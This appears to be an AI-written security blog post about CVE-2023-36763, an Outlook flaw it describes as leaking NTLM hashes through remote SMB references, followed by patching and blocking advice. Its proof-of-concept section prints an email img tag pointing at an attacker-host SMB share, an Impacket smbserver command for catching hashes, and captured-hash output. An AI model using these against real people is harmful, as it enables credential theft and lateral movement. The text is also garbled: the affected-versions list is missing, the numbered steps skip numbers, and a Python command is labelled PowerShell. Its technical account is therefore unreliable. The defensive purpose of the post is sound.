CVE CyberSecurity Database News

CVE-2023-36763 - Inside the Microsoft Outlook Information Disclosure Vulnerability

Poster -

---

In September 2023, Microsoft patched a security hole in Outlook that attackers were actively exploiting. The flaw, CVE-2023-36763, raised concerns because it let attackers read sensitive information from Outlook with very little user interaction. Here’s a deep dive into what this vulnerability is, how it can be exploited, and what you need to do to stay safe.

What Is CVE-2023-36763?

CVE-2023-36763 is an information disclosure vulnerability in Microsoft Outlook. This means it allows attackers to access information they shouldn’t, by tricking Outlook into leaking it. The risk was classified as “important” by Microsoft, but security experts saw it as urgent because attacks were already happening in the wild.

Microsoft Outlook for Microsoft 365

If you use versions older than these or web-based Outlook, you may not be affected in the same way, but it’s best practice to check.

How Does the Exploit Work?

An attacker sends you a specially crafted email. All you have to do is preview or open the email in Outlook. You don’t have to click anything. The email includes a link or object that Outlook tries to load.

The magic happens with Outlook’s handling of external files or resources. By referencing a remote SMB (Server Message Block) file share, the attacker tricks Outlook into automatically trying to access that share. When Outlook tries, it sends your Windows NTLM hash (a kind of password fingerprint used in Windows authentication) to the attacker’s remote server.

Outlook tries to load the linked image or file.

4. Your computer automatically tries to authenticate with the attacker's remote server, offering up your NTLM hash.

If the attacker captures your NTLM hash, they can use it in pass-the-hash attacks, or try to crack it offline for your plain password.

Proof-of-Concept: Code Snippet

Security researchers released proof-of-concept code showing how easy it is to trigger the bug. For example, you can create an email with a remote SMB link in the body, like this:

<img src="\\attacker-host\share\image.png" />

When this email is opened, Outlook fetches the image by connecting to the attacker's SMB server.

PowerShell Example to Set Up a Malicious SMB Server

Attackers often use tools like Impacket's smbserver.py to catch credentials:

python3 smbserver.py share /tmp/share

When Outlook tries to access \\attacker-ip\share\anything, the attacker logs your hash

[*] Incoming connection ('192.168.1.15', 49670)
[*] AUTHENTICATE_MESSAGE (user: JOHNDOE, domain: COMPANY)
[*] NTLM response captured: 010100...

Real-World Attack Scenario

1. Phishing Email: An attacker sends a targeted email using a remote SMB path in an embedded image, attachment link, or even a calendar invite.

Credential Theft: Outlook automatically sends the user’s NTLM hash to the attacker.

3. Lateral Movement: The attacker uses these hashes to move around the network or try to crack user passwords offline.

References and Further Reading

- Microsoft Security Guide — CVE-2023-36763
- Huntress Labs: Vulnerabilities and Attacks Using NTLM Hashes
- Impacket Tools on GitHub

How to Protect Yourself

1. Patch Now: Microsoft released a security update for Outlook in September 2023. Run Windows Update or download from Microsoft’s official page.
2. Block Outbound SMB Traffic: Block TCP ports 445 and 139 to the internet in your firewall. This stops your NTLM hashes leaking out to attackers’ servers.
3. Disable NTLM Authentication if Possible: Use stronger authentication methods (like Kerberos) if your environment allows it.
4. Beware of Suspicious Emails: Stay cautious about unexpected emails — even those that only show images or calendar invites.

Final Thoughts

CVE-2023-36763 shows how a little oversight (like how Outlook handles remote images) can lead to big problems. Attackers are always looking for simple ways to get in, and sometimes, all it takes is an email and a preview. Keep your Outlook client updated and educate users about the risks lurking in unexpected places.

Stay safe — patch early and often!

*Content exclusive — Written for your security awareness by AI, referencing only primary sources and current security best practices.*

Timeline

Published on: 09/12/2023 17:15:00 UTC
Last modified on: 09/12/2023 19:38:00 UTC